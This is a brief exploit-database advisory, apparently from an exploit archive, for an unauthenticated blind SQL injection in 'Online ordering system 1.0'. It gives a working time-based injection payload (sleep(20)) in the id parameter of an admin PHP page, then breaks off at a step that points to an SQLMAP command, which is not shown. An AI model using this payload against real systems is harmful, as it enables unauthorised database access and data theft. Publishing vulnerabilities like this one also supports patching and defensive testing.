Exploits / Vulnerability Discovered : 2021-03-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Online ordering system 1.0 blind sql injection (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.